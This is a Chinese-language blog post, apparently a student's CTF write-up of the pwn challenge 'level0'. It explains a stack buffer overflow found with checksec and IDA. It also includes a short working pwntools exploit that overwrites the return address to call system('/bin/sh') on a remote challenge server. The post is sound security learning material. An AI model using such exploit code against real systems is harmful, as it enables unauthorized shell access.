<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Pwn | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Welcom 一、level0 1.1用checksec查看下载附件，使用checksec命令查看该程序是32位还是64位，开启了哪些保护。  NX 代表 不可执行 (non-executable) 。它通常在 CPU 层面上启用，因此启用 NX 的操作系统可以将某些内存区域标记为不可执行。通常，缓冲区溢出漏洞将恶意代码放在堆栈上，然后尝试执行它。但是，让堆栈这些可写区域变得不可执行，可以防止这种">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn">
<meta property="og:url" content="http://example.com/2023/03/05/pwn/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Welcom 一、level0 1.1用checksec查看下载附件，使用checksec命令查看该程序是32位还是64位，开启了哪些保护。  NX 代表 不可执行 (non-executable) 。它通常在 CPU 层面上启用，因此启用 NX 的操作系统可以将某些内存区域标记为不可执行。通常，缓冲区溢出漏洞将恶意代码放在堆栈上，然后尝试执行它。但是，让堆栈这些可写区域变得不可执行，可以防止这种">
<meta property="og:locale" content="zh_TN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/94804d959252e33b5031fb1d2f863cdf.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/f08a4f0a7f7d42a23a9dff948886153d.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/81738c64d4ff827f301111ce6955c3b6.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/6997c705143c0285f6d7c587636ab82c.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/81b14e74550c3baab9b5d056f7b658d7.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/cac97a368deb9ed60f0946301f9527a3.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/83f0a4d3a6264cb164ca2c775d3873b7.png">
<meta property="og:image" content="c:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230228131023932.png">
<meta property="article:published_time" content="2023-03-04T21:23:01.422Z">
<meta property="article:modified_time" content="2023-03-04T21:26:40.126Z">
<meta property="article:author" content="tao">
<meta property="article:tag" content="shangjuntao001">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/img_convert/94804d959252e33b5031fb1d2f863cdf.png">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/http://oayoilchh.bkt.clouddn.com/2016/07/27/18:05:26%20">
  
  
      
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
        <a href="/" class="profilepic">
            
            <img lazy-src="" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  target="_blank" rel="noopener" href="https://github.com/tianxihenan">博客首页</a></li>
                        
                            <li><a  href="/archives">文章归档</a></li>
                        
                            <li><a  href="/CTFStudy">学习导航</a></li>
                        
                            <li><a  href="/PWNABLE">PWNABLE</a></li>
                        
                            <li><a  href="/resume">个人简历</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail"  target="_blank" href="http://mail.qq.com" title="mail">mail</a>
                            
                                <a class="fl github"  target="_blank" href="https://github.com/tianxihenan/tianxihenan.github.io" title="github">github</a>
                            
                                <a class="fl zhihu"  target="_blank" href="https://www.zhihu.com" title="zhihu">zhihu</a>
                            
                                <a class="fl weibo"  target="_blank" href="http://weibo.com" title="weibo">weibo</a>
                            
                                <a class="fl rss"  target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://ring3.xyz/">Yllen</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://mxny.org/">麦香浓郁</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://whereisk0shl.top/">K0sh1</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.ycjcl.cc/">信鑫</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://bystudent.com/">ByStundet表哥</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://www.jarviswang.me/">汪神_Jarvis</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://sh3ll.me/">Chu</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://www.hackfun.org/">4ido10n</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy">L3m0n</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://o0xmuhe.me/">muhe</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://blog.nuptzj.cn/">_画船听雨</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.virzz.com/index.html">Virink</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.sqlsec.com/">国光</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.bodkin.ren/">老锥</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.cizel.cn/">C1zel</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://1phan.cc">1phan</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://www.liuil.top/">liuil</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/Ox9A82/">Ox9A82</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://burnegg.com/">burnegg</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://jwrsec.cn/">jwr-sec</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://sudalover.cn/">苏打</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://blog.binklac.com">VeroFess</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.bendawang.site/">bendawang</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://weeklyalgo.codes/">hook</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.flier.net.cn/">Flier&#39;blog</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://www.mutepig.club">mutepig</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="https://blog.iret.xyz/list.aspx">Silver</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://simp1e.leanote.com/">Simple</a>
                    
                      <a target="_blank"  class="main-nav-link switch-friends-link" href="http://processor.pub/">Processor</a>
                    
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">一只淹死在二进制海洋里的二进制狗</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a target="_blank" rel="noopener" href="https://github.com/tianxihenan">博客首页</a></li>
                
                    <li><a href="/archives">文章归档</a></li>
                
                    <li><a href="/CTFStudy">学习导航</a></li>
                
                    <li><a href="/PWNABLE">PWNABLE</a></li>
                
                    <li><a href="/resume">个人简历</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="http://mail.qq.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/tianxihenan/tianxihenan.github.io" title="github">github</a>
                    
                        <a class="zhihu" target="_blank" href="https://www.zhihu.com" title="zhihu">zhihu</a>
                    
                        <a class="weibo" target="_blank" href="http://weibo.com" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-pwn" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2023/03/05/pwn/" class="article-date">
      <time datetime="2023-03-04T21:23:01.422Z" itemprop="datePublished">2023-03-05</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Pwn
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>Welcom</p>
<h1 id="一、level0"><a href="#一、level0" class="headerlink" title="一、level0"></a>一、level0</h1><p><img src="https://img-blog.csdnimg.cn/img_convert/94804d959252e33b5031fb1d2f863cdf.png" alt="img"></p>
<h3 id="1-1用checksec查看"><a href="#1-1用checksec查看" class="headerlink" title="1.1用checksec查看"></a>1.1用checksec查看</h3><p>下载附件，使用checksec命令查看该程序是32位还是64位，开启了哪些保护。<img src="https://img-blog.csdnimg.cn/img_convert/f08a4f0a7f7d42a23a9dff948886153d.png" alt="img"></p>
<blockquote>
<p><strong>NX 代表 不可执行</strong> (non-executable) 。它通常在 CPU 层面上启用，因此启用 NX 的操作系统可以将某些内存区域标记为不可执行。通常，缓冲区溢出漏洞将恶意代码放在堆栈上，然后尝试执行它。但是，让堆栈这些可写区域变得不可执行，可以防止这种攻击。</p>
</blockquote>
<h3 id="1-2-ida"><a href="#1-2-ida" class="headerlink" title="1.2 ida"></a>1.2 ida</h3><p>接着我们将文件放到<strong>IDA</strong>64位里，用f5反汇编查看<img src="https://img-blog.csdnimg.cn/img_convert/81738c64d4ff827f301111ce6955c3b6.png" alt="img"></p>
<p>代码中提示有一个vulnerable_function()函数进入查看<img src="https://img-blog.csdnimg.cn/img_convert/6997c705143c0285f6d7c587636ab82c.png" alt="img"></p>
<p>显而易见此处存在栈溢出漏洞，buf的长度为128个字节（也就是0x80）但是read()函数允许往buf中输入<strong>0x200</strong>字节数据。</p>
<blockquote>
<p>&#x2F;bin&#x2F;sh是一个特殊的字符串，它代表了一个Unix&#x2F;Linux系统中的shell程序，通常是Bash。在pwn题中，攻击者可以通过控制程序的输入，将&#x2F;bin&#x2F;sh的地址作为参数传递给system函数或者execve函数，从而获取一个shell进程并执行命令。因此，&#x2F;bin&#x2F;sh通常被用于pwn题中的ROP（Return-oriented programming）或者其他代码执行漏洞的利用中。</p>
</blockquote>
<p>接着，我们shift+F12可以看到有个很可疑的&#x2F;bin&#x2F;sh，我们双击进去看看</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/81b14e74550c3baab9b5d056f7b658d7.png" alt="img"></p>
<p>接着我们点击那一行后面的<strong>callsystem</strong>进入它的函数体</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/cac97a368deb9ed60f0946301f9527a3.png" alt="img"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/83f0a4d3a6264cb164ca2c775d3873b7.png" alt="img"></p>
<p>该函数调用了system(“&#x2F;bin&#x2F;sh”)我们可以利用此函数来get shell</p>
<h3 id="1-3整体思路："><a href="#1-3整体思路：" class="headerlink" title="1.3整体思路："></a><strong>1.3整体思路：</strong></h3><p><strong>是向buf处输入0x80字节的数据填满buf，此时在继续输入0x80字节的数据造成溢出覆盖ebp处的数据。</strong></p>
<p><strong>再继续输入数据把返回地址处的数据覆盖为callsystem()的地址，这样vulnerable_function()函数原本要返回到main()函数但是却返回到了callsystem()函数来执行callsystem()</strong></p>
<h3 id="1-4接下来开始写exp："><a href="#1-4接下来开始写exp：" class="headerlink" title="1.4接下来开始写exp："></a>1.4接下来开始写exp：</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote (<span class="string">&#x27;61.147.171.105&#x27;</span>, <span class="number">54500</span>)<span class="comment">#连接远程</span></span><br><span class="line">elf = ELF(<span class="string">&#x27;./23&#x27;</span>)<span class="comment">#打开本地程序</span></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x80</span>+<span class="number">0x8</span>) + p64(elf.symbols[<span class="string">&#x27;callsystem&#x27;</span>])<span class="comment">#构造payload 需要覆盖0x80个地址+上个ebp地址\# 输入payload来进行操作以拿到程序的shell payload一般等于 偏移量 + 地址</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;Hello, World\n&quot;</span>)<span class="comment">#接收远程的返回</span></span><br><span class="line">p.send(payload)<span class="comment">#发送payload</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>运行脚本得到flag!</p>
<p><img src="C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20230228131023932.png" alt="image-20230228131023932"></p>
<p><strong>以下是我对上面exp的一些函数的总结，这也是我正在学习的象征，虽然只能做一些简单的题，不过我会加油的。</strong></p>
<p><strong>在编写pwn题的exp代码时，通常需要调试和测试代码，因此需要输出详细的日志信息。因此，<code>context.log_level=&quot;debug&quot;</code>可以帮助开发者更好地了解代码的执行过程和结果，从而更快地发现和解决问题。</strong></p>
<blockquote>
<p>**p.recvuntil(string)**是pwntools库中的一个函数，用于接收程序输出中的数据，直到包含指定字符串<code>string</code>的数据出现为止。具体来说，它会等待程序输出数据，并将数据缓存到一个数据缓冲区中，直到缓冲区中包含了指定的字符串<code>string</code>为止，然后返回缓冲区中的数据。如果程序输出中没有包含指定的字符串<code>string</code>，则<code>p.recvuntil(string)</code>会一直等待，直到超时或者接收到数据为止。如果超时，则会抛出一个异常。</p>
<p>在编写pwn题的exp代码时，通常需要从程序输出中获取一些敏感信息，例如栈指针、libc的基址等等。因此，可以使用<code>p.recvuntil(string)</code>函数接收程序输出中的数据，并从中提取需要的信息。通常情况下，需要多次使用<code>p.recvuntil(string)</code>函数接收程序输出中的数据，以便于获取完整的信息和数据。</p>
</blockquote>
<p><strong>需要注意的是，在使用<code>p.recvuntil(string)</code>函数时，需要确保指定的字符串<code>string</code>是唯一的，否则可能会导致接收到错误的数据或者超时。为了避免这种情况，可以使用一些特殊的字符串或者标记来区分不同的输出数据。另外，在实际使用中，需要根据程序的具体输出格式和漏洞类型，选择合适的接收函数和接收方式，以便于获取正确的数据并编写有效的exploit代码</strong>。</p>
<blockquote>
<p>**p.sendline(payload)**是pwntools库中的一个函数，用于向程序发送数据并添加一个换行符。具体来说，它会将指定的数据<code>payload</code>发送给程序，并在数据的末尾添加一个换行符<code>\n</code>，以便于模拟用户在终端中输入数据的行为。发送数据后，函数会等待程序的响应并将响应数据缓存到一个数据缓冲区中，然后返回缓冲区中的数据。如果程序没有响应或者响应超时，则会抛出一个异常。</p>
<p>在编写pwn题的exploit代码时，通常需要向程序发送一些特定的数据，例如缓冲区溢出的payload、格式化字符串的参数等等。使用<code>p.sendline(payload)</code>函数可以将这些数据发送给程序，并使用<code>\n</code>换行符模拟用户输入的行为。这样可以使payload或者输入数据更加真实和有效，从而更容易绕过一些安全保护和检测机制，例如ASLR和DEP等。</p>
</blockquote>
<p><strong>需要注意的是，在使用<code>p.sendline(payload)</code>函数时，需要确保发送的数据和换行符的格式是正确的，否则可能会导致程序崩溃或者无法正常运行。为了避免这种情况，可以使用一些特殊的字符或者标记来区分不同的数据，或者使用一些工具或者脚本来自动生成payload或者输入数据。另外，在实际使用中，需要根据程序的具体输入格式和漏洞类型，选择合适的发送函数和发送方式，以便于构造有效的exploit代码。</strong></p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2023/03/05/pwn/">Pwn</a></p>
        <p><span>文章作者:</span><a href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2023年03月05日 - 05时23分</p>
        <p><span>最后更新:</span>2023年03月05日 - 05时26分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2023/03/05/pwn/" title="Pwn">http://example.com/2023/03/05/pwn/</a>
            <span class="copy-path" data-clipboard-text="原文: http://example.com/2023/03/05/pwn/　　作者: " title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2023/03/05/web/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2023/03/05/Crypto/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Crypto</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81level0"><span class="toc-number">1.</span> <span class="toc-text">一、level0</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-1%E7%94%A8checksec%E6%9F%A5%E7%9C%8B"><span class="toc-number">1.0.1.</span> <span class="toc-text">1.1用checksec查看</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-2-ida"><span class="toc-number">1.0.2.</span> <span class="toc-text">1.2 ida</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-3%E6%95%B4%E4%BD%93%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.0.3.</span> <span class="toc-text">1.3整体思路：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-4%E6%8E%A5%E4%B8%8B%E6%9D%A5%E5%BC%80%E5%A7%8B%E5%86%99exp%EF%BC%9A"><span class="toc-number">1.0.4.</span> <span class="toc-text">1.4接下来开始写exp：</span></a></li></ol></li></ol></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">


<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <section id="comments">
  <div id="disqus_thread"></div>
    <script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'tao'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2023/03/05/web/" title="上一篇: ">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2023/03/05/Crypto/" title="下一篇: Crypto">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2023/03/05/web/">web</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/03/05/pwn/">Pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/03/05/Crypto/">Crypto</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/02/25/hello-world/">Hello World</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2023 tao
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="http://bestwing.me" target="_blank">Sw'blog</a> by Swing
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


    <script type="text/javascript">
      window.onload = function(){
        document.getElementById("search").onclick = function(){
            console.log("search")
            search();
        }
      }
      function search(){
        (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
        (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
        e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
        })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

        _st('install','A1Pz-LKMXbrzcFg2FWi6','2.0.0');
      }
    </script>

  </div>
</body>
</html>